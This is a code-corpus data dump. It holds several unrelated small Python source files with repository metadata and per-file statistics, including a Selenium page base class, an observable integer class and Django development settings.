] | null | null | null | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
] | null | null | null | py3rijndael/__init__.py | squaresmile/py3rijndael | 569fe2a4b2ab5ccb4768e2fabcd0fa398e3c97fc | [
"MIT"
] | null | null | null | from py3rijndael.paddings import Pkcs7Padding, ZeroPadding
from py3rijndael.rijndael import Rijndael, RijndaelCbc
__version__ = "0.3.5"
__all__ = ["Pkcs7Padding", "ZeroPadding", "Rijndael", "RijndaelCbc"]
| 23.222222 | 68 | 0.779904 | 21 | 209 | 7.380952 | 0.619048 | 0.193548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037634 | 0.110048 | 209 | 8 | 69 | 26.125 | 0.795699 | 0 | 0 | 0 | 0 | 0 | 0.22488 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b066736be06ab5a0929e3d2af78da8ea95392b4 | 911 | py | Python | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | 1 | 2020-01-19T01:19:57.000Z | 2020-01-19T01:19:57.000Z | Ar_Script/unittest_demo/BBS/test_case/page_obj/base.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | class Page(object):
'''
页面基类,用于所有页面的继承
初始化,地址,驱动,超时时间
打开网页方法
查找单个元素方法
查找多个元素方法
页面打开检查
调用JavaScript代码
'''
bbs_url='https://mail.qq.com'
def __init__(self,selenium_driver,base_url=bbs_url,parent=None):
self.base_url=base_url
self.timeout=30
self.driver=selenium_driver
self.parent=parent
def _open(self,url):
self.url=self.base_url+url
self.driver.get(self.url)
assert self.on_page() ,'【%s】打开失败'%self.url
def open(self):
return self._open(self.url)
def on_page(self):
print(self.driver.current_url)
return self.driver.current_url==(self.url)
def find_element(self,*loc):
return self.driver.find_element(*loc)
def find_elments(self,*loc):
return self.find_elments(*loc)
def script(self,src):
return self.driver.execute_script(src) | 23.358974 | 68 | 0.628979 | 124 | 911 | 4.435484 | 0.370968 | 0.109091 | 0.054545 | 0.072727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002933 | 0.251372 | 911 | 39 | 69 | 23.358974 | 0.803519 | 0.084523 | 0 | 0 | 0 | 0 | 0.034134 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.318182 | false | 0 | 0 | 0.181818 | 0.636364 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
3b0e3a300cfd5fa0db71dc9dbdded0e8a717dc33 | 168 | py | Python | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | ephys_anonymizer/__init__.py | alexrockhill/video_anonymize | e3d672f46f48a21e2320c9815f9769902bbe943d | [
"BSD-3-Clause"
] | null | null | null | """A anonymization toolbox for video and neuroimaging files."""
__version__ = '0.1.5'
from ephys_anonymizer.anonymizer import video_anonymize, raw_anonymize # noqa
| 24 | 78 | 0.779762 | 22 | 168 | 5.636364 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.130952 | 168 | 6 | 79 | 28 | 0.828767 | 0.375 | 0 | 0 | 0 | 0 | 0.050505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b641a0c2766ce37091f0a6b3166ad667f6adaa2 | 2,209 | py | Python | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null | pyrez/api/APIBase.py | pytheous/Pyrez | 85f6f27359288b5f0ad70ff543f247843ac326f9 | [
"MIT"
] | null | null | null |
from ..exceptions.ServiceUnavailable import ServiceUnavailable
from ..logging import create_logger
from ..utils.http import http_request
class APIBase:
#Do not instantiate this object directly; instead, use::
"""Provide an base class for easier requests. DON'T INITALISE THIS YOURSELF!
Attributes
----------
headers : class:`dict`
cookies : class:`dict`
Keyword arguments
-----------------
headers : class:`dict`
cookies : class:`dict`
Methods
-------
__init__(devId, header=None)
_encode(string, encodeType="utf-8")
_httpRequest(url, headers=None)
"""
def __init__(self, headers=None, cookies=None, loggerName=None, debug_mode=True):
self.debug_mode = debug_mode
if self.debug_mode:
self.logger = create_logger(loggerName or self.__class__.__name__)
def __enter__(self):
"""Enable context management usage: `with APIBase() as api_base`"""
return self
def __exit__(self, *args):
"""Clean up."""
pass
@classmethod
def _encode(cls, string, encodeType="utf-8"):
"""
Parameters
----------
string [str]:
encodeType [str]:
Returns
-------
str
String encoded to format type
"""
return str(string).encode(encodeType)
def _httpRequest(self, url, method='GET', raise_for_status=True, params=None, headers=None, json=None, *args, **kwargs):
"""Make a synchronous HTTP request with the `requests` library.
Parameters
----------
url : str
URL of the resource
method : |STR|
HTTP method to be used by the request
headers : |DICT|
Custom headers
"""
r, t = http_request(url, method=method, params=params, headers=headers, json=json, *args, **kwargs)
if raise_for_status:
if hasattr(r, 'status_code') and r.status_code == 503 or 'The API is unavailable' in r.text:
raise ServiceUnavailable(r.text)
r.raise_for_status()
return t
def close(self):
"""Properly close the underlying HTTP session"""
pass
| 30.680556 | 124 | 0.593481 | 248 | 2,209 | 5.104839 | 0.447581 | 0.028436 | 0.033175 | 0.036335 | 0.050553 | 0.050553 | 0 | 0 | 0 | 0 | 0 | 0.003161 | 0.283839 | 2,209 | 71 | 125 | 31.112676 | 0.797092 | 0.375736 | 0 | 0.083333 | 0 | 0 | 0.035902 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.083333 | 0.125 | 0 | 0.541667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
3b760115ef07c1475153b48cd74f10e8e8b417e7 | 6,096 | py | Python | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | 1 | 2018-01-11T14:01:05.000Z | 2018-01-11T14:01:05.000Z | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | observables/integer.py | North-Guard/observable_primitives | 4ab8ad6f67b79490209815051d7731393413d3dd | [
"MIT"
] | null | null | null | from typing import Callable, SupportsInt, SupportsFloat, SupportsRound, SupportsComplex, SupportsAbs, SupportsBytes
from observable_primitives.observables.numeric_base import ObservableNumeric
class ObservableInteger(ObservableNumeric, SupportsInt, SupportsFloat, SupportsRound, SupportsComplex, SupportsAbs,
SupportsBytes):
def __init__(self, val=0, final_value=None, incorrect_type_handler="round"):
"""
An integer which is observable.
All methods and operations that work on integer should work on this class and have identical behavior.
The only exception are the augmented arithmetic assignments, these all call the observers:
+=, -=, *=, /=, //=, %=, **=, <<=, >>=, &=, ^=, |=
:param val: Anything that can be cast to an int.
:param str | Callable incorrect_type_handler:
"""
super().__init__(val=int(val))
self._incorrect_type_policy = incorrect_type_handler
self.final_value = final_value
# Unary
def __index__(self): # For indexing in list etc.
return self._val
def __invert__(self):
return ~self._val
# Arithmetics
def __pow__(self, power, modulo=None):
return pow(self._val, power, modulo)
def __rpow__(self, power, modulo=None):
return pow(power, self._val, modulo)
# Arithmetics: Divisions and Modulo
def __floordiv__(self, other):
return self._val // other
def __rfloordiv__(self, other):
return other // self._val
def __mod__(self, other):
return self._val % other
def __rmod__(self, other):
return other % self._val
def __divmod__(self, other):
return divmod(self._val, other)
def __rdivmod__(self, other):
return divmod(other, self._val)
# Arithmetics: Binary
def __lshift__(self, other):
return self._val << other
def __rlshift__(self, other):
return other << self._val
def __rshift__(self, other):
return self._val >> other
def __rrshift__(self, other):
return other >> self._val
# Boolean
def __and__(self, other):
return self._val & other
def __rand__(self, other):
return other & self._val
def __or__(self, other):
return self._val | other
def __ror__(self, other):
return other | self._val
def __xor__(self, other):
return self._val ^ other
def __rxor__(self, other):
return other ^ self._val
# Representation
def __bytes__(self) -> bytes:
return bytes(self._val)
# Conversions
def __complex__(self) -> complex:
return complex(self._val)
def __int__(self) -> int:
return int(self._val)
def __float__(self) -> float:
return float(self._val)
def __round__(self, n=None) -> round:
return round(self._val, n)
# Augmented arithmetics
def __ilshift__(self, other):
previous = self._val
self._val <<= other
return self._ireturn(method="__ilshift__", other=other, previous=previous)
def __irshift__(self, other):
previous = self._val
self._val >>= other
return self._ireturn(method="__irshift__", other=other, previous=previous)
def __iand__(self, other):
previous = self._val
self._val &= other
return self._ireturn(method="__iand__", other=other, previous=previous)
def __ixor__(self, other):
previous = self._val
self._val ^= other
return self._ireturn(method="__ixor__", other=other, previous=previous)
def __ior__(self, other):
previous = self._val
self._val |= other
return self._ireturn(method="__ior__", other=other, previous=previous)
def __imod__(self, other):
previous = self._val
self._val %= other
return self._ireturn(method="__imod__", other=other, previous=previous)
def __ipow__(self, other, modulo=None):
previous = self._val
self._val = pow(self._val, other, modulo)
return self._ireturn(method="__ipow__", other=other, modulo=modulo, previous=previous)
# Observation method
def _ireturn(self, *, method, other, **kwargs):
# Check if incorrect type
if not isinstance(self._val, int):
name = type(self).__name__
# String keyword policies
if isinstance(self._incorrect_type_policy, str):
if self._incorrect_type_policy.lower() == "round":
self._val = round(self._val)
elif self._incorrect_type_policy.lower() == "int":
self._val = int(self._val)
else:
raise ValueError(f"Value of {name} is not an integer. Instead it is {type(self._val)}.")
# Check for callable policy
elif isinstance(self._incorrect_type_policy, Callable):
self._val = self._incorrect_type_policy(self._val)
# Raise error
else:
raise ValueError(f"Value of {name} is not an integer. Instead it is {type(self._val)}.")
# Notify observers
self.update_observers(method=method, other=other, new_val=self._val, **kwargs)
return self
# Class specifics
@property
def imag(self):
return 0
@property
def real(self):
return self._val
def conjugate(self):
return complex(self._val, 0)
def bit_length(self):
return self._val.bit_length()
def from_bytes(self, bytes, byteorder, *, signed):
return self._val.from_bytes(bytes=bytes, byteorder=byteorder, signed=signed)
def to_bytes(self, length, byteorder, *, signed):
return self._val.to_bytes(length=length, byteorder=byteorder, signed=signed)
# Added specials
def range(self, *args):
if len(args) == 1:
self.final_value = args[0] - 1
else:
self.final_value = args[1] - 1
for i in range(*args):
yield self.set(i, method="range")
| 29.592233 | 115 | 0.621391 | 704 | 6,096 | 4.997159 | 0.221591 | 0.111427 | 0.068221 | 0.03411 | 0.436612 | 0.31552 | 0.241046 | 0.138715 | 0.138715 | 0.138715 | 0 | 0.001811 | 0.275262 | 6,096 | 205 | 116 | 29.736585 | 0.794477 | 0.112205 | 0 | 0.130081 | 0 | 0 | 0.039947 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.01626 | 0.252033 | 0.674797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
3b87d0d0e1f347b21acbab96ded62520b7e2bd04 | 54 | py | Python | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | credentials.py | BAHETIHARSH/automate-linkedin | 99af94bf0894b2901d9f9a54ba2a440c69dcfc64 | [
"MIT"
] | null | null | null | loginid = "your login id"
password = "your password" | 27 | 27 | 0.703704 | 7 | 54 | 5.428571 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 54 | 2 | 28 | 27 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0.481481 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.5 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
3b8ebfe0b1ca313f1d2207256efed0dbd4039431 | 38 | py | Python | chocopy-rs/test/original/pa2/expr_var_assign.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 7 | 2021-08-28T18:20:45.000Z | 2022-02-01T07:35:59.000Z | chocopy-rs/test/original/pa2/expr_var_assign.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 5 | 2020-03-04T23:49:17.000Z | 2021-12-09T21:42:55.000Z | tests/typecheck/expr_var_assign.py | yangdanny97/chocopy-python-frontend | d0fb63fc744771640fa4d06076743f42089899c1 | [
"MIT"
] | 3 | 2019-11-07T23:54:49.000Z | 2021-06-21T20:45:54.000Z | x:int = 1
o:object = None
x = o = 42
| 7.6 | 15 | 0.526316 | 9 | 38 | 2.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 0.315789 | 38 | 4 | 16 | 9.5 | 0.653846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b91e4b5aa6dd4f1b05b89a6f707cb59981bdd7e | 68 | py | Python | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | 1 | 2022-02-06T17:50:25.000Z | 2022-02-06T17:50:25.000Z | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | null | null | null | 2 semester/PW/Coursera/Python/1 Week/11.py | kurpenok/Labs | 069c92b7964a1445d093313b38ebdc56318d2a73 | [
"MIT"
] | 1 | 2022-03-02T06:45:06.000Z | 2022-03-02T06:45:06.000Z | m = int(input())
m = m % 1440
a = m // 60
b = m % 60
print(a, b)
| 7.555556 | 16 | 0.441176 | 15 | 68 | 2 | 0.533333 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 0.338235 | 68 | 8 | 17 | 8.5 | 0.488889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b979b8b27ffcfe9bd6784d35e976ab788514c6d | 146 | py | Python | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | 2 | 2020-11-22T13:51:34.000Z | 2020-11-24T20:18:15.000Z | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | null | null | null | src/examples/minimal.py | apatrushev/aioflows | 2e8fb3d84c0b177931bb92f9693349985c83fe37 | [
"MIT"
] | null | null | null | import asyncio
from aioflows.simple import Printer, Ticker
async def start():
await (Ticker() >> Printer()).start()
asyncio.run(start())
| 13.272727 | 43 | 0.691781 | 18 | 146 | 5.611111 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 146 | 10 | 44 | 14.6 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
3b9d427a5ce89470aa288f0a8a1dd15c162dccb4 | 190 | py | Python | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | null | null | null | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | 1 | 2017-07-14T09:52:30.000Z | 2017-07-14T09:52:30.000Z | src/zeit/ldap/generation/__init__.py | ZeitOnline/zeit.ldap | 42dbf372d8108a011b3d112126e3769a130e52e7 | [
"BSD-3-Clause"
] | null | null | null | import zope.generations.generations
minimum_generation = 3
generation = 3
manager = zope.generations.generations.SchemaManager(
minimum_generation, generation, "zeit.ldap.generation")
| 23.75 | 59 | 0.810526 | 20 | 190 | 7.6 | 0.5 | 0.197368 | 0.342105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011765 | 0.105263 | 190 | 7 | 60 | 27.142857 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
3b9f8d121dded93a938e61065a3bf850418949f4 | 79 | py | Python | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | mmpose/models/necks/__init__.py | jlgzb/mmpose | 0ecf06e3580f141f6ab44645768a0d6d8ba48383 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | from .gap_neck import GlobalAveragePooling
__all__ = ['GlobalAveragePooling']
| 19.75 | 42 | 0.822785 | 7 | 79 | 8.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101266 | 79 | 3 | 43 | 26.333333 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.253165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8e560ea211629f88d2305a2cde17e367e5845602 | 785 | py | Python | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | 6 | 2015-09-10T14:35:03.000Z | 2021-01-16T09:32:00.000Z | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | null | null | null | util.py | davidar/polya | b796e38f39c8d5d82db67275423127d774fde171 | [
"MIT"
] | 1 | 2017-09-13T19:10:35.000Z | 2017-09-13T19:10:35.000Z | import operator
def prod(xs):
return reduce(operator.mul, xs, 1)
class DynEnum(object):
def __init__(self):
self.ident = {} # str -> int
self.names = [] # int -> str
def __call__(self, name):
if name in self.ident:
return self.ident[name]
else:
i = len(self)
self.ident[name] = i
self.names.append(name)
return i
def __getitem__(self, i):
return self.names[i]
def __contains__(self, name):
return name in self.ident
def __len__(self):
return len(self.names)
class DynDict(dict):
def __init__(self, f):
dict.__init__(self)
self.f = f
def __missing__(self, key):
val = self[key] = self.f(key)
return val
| 24.53125 | 38 | 0.550318 | 101 | 785 | 3.960396 | 0.336634 | 0.1125 | 0.055 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001916 | 0.335032 | 785 | 31 | 39 | 25.322581 | 0.764368 | 0.026752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0.142857 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8e5a77b0b67c023d2789aba656c385ac5032dd71 | 5,104 | py | Python | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | null | null | null | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | 9 | 2020-02-12T00:03:08.000Z | 2022-02-10T07:52:04.000Z | backend/infs3202/settings/base.py | eivrei/INFS3202 | e5b2aa29768a75475f4be3a31d824de842c8b1e9 | [
"MIT"
] | null | null | null | """
Django settings for infs3202 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z%6vtjnpsra+m1r%3s=pavbpeiz12a_&8u0qf^p(fg6c8)i%it'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
API_VERSION = 'v1'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'infs3202.users',
'infs3202.events',
'infs3202.password_reset'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'infs3202.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'infs3202.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'infs3202',
'USER': 'infs3202',
'PASSWORD': '',
'HOST': 'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME': 'infs3202.utils.validators.MinimumNumberOfSymbolsValidator',
},
{
'NAME': 'infs3202.utils.validators.UppercaseValidator',
},
{
'NAME': 'infs3202.utils.validators.NumberValidator',
}
]
AUTH_USER_MODEL = 'users.User'
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.AllowAllUsersModelBackend',
)
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(days=7),
'REFRESH_TOKEN_LIFETIME': timedelta(days=15),
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Australia/Brisbane'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/uploads/'
# CORS
CORS_ORIGIN_WHITELIST = list(
{'127.0.0.1:3000', 'localhost:3000', 'thebigevent.xyz', 'www.thebigevent.xyz', 'staging.thebigevent.xyz', 'www.staging.thebigevent.xyz'}
)
# Rest Framework
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': ['rest_framework.permissions.IsAuthenticatedOrReadOnly'],
'DEFAULT_RENDERER_CLASSES': [
'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer'
],
'DEFAULT_PARSER_CLASSES': [
'djangorestframework_camel_case.parser.CamelCaseJSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication'
],
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 6
}
# Email
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = 'email' # Change this
EMAIL_HOST_PASSWORD = 'password' # Change this
EMAIL_USE_TLS = True
FRONTEND_URL = 'http://127.0.0.1:3000'
| 28.674157 | 140 | 0.702194 | 544 | 5,104 | 6.439338 | 0.411765 | 0.059378 | 0.038824 | 0.049957 | 0.157294 | 0.132743 | 0.07622 | 0.07622 | 0.034256 | 0 | 0 | 0.0251 | 0.164773 | 5,104 | 177 | 141 | 28.836158 | 0.796622 | 0.202978 | 0 | 0.032787 | 1 | 0 | 0.573657 | 0.46769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.065574 | 0.016393 | 0 | 0.016393 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8e948dd6b36b98377cd26d3e42151c11724995ee | 1,630 | py | Python | auto_script.py | UrWorstNytmare/SEVA---Sparrow-an-Essential-Voice-Assistant | 37c009aaf7e28663681b8bfb217859a4b2f7fccc | [
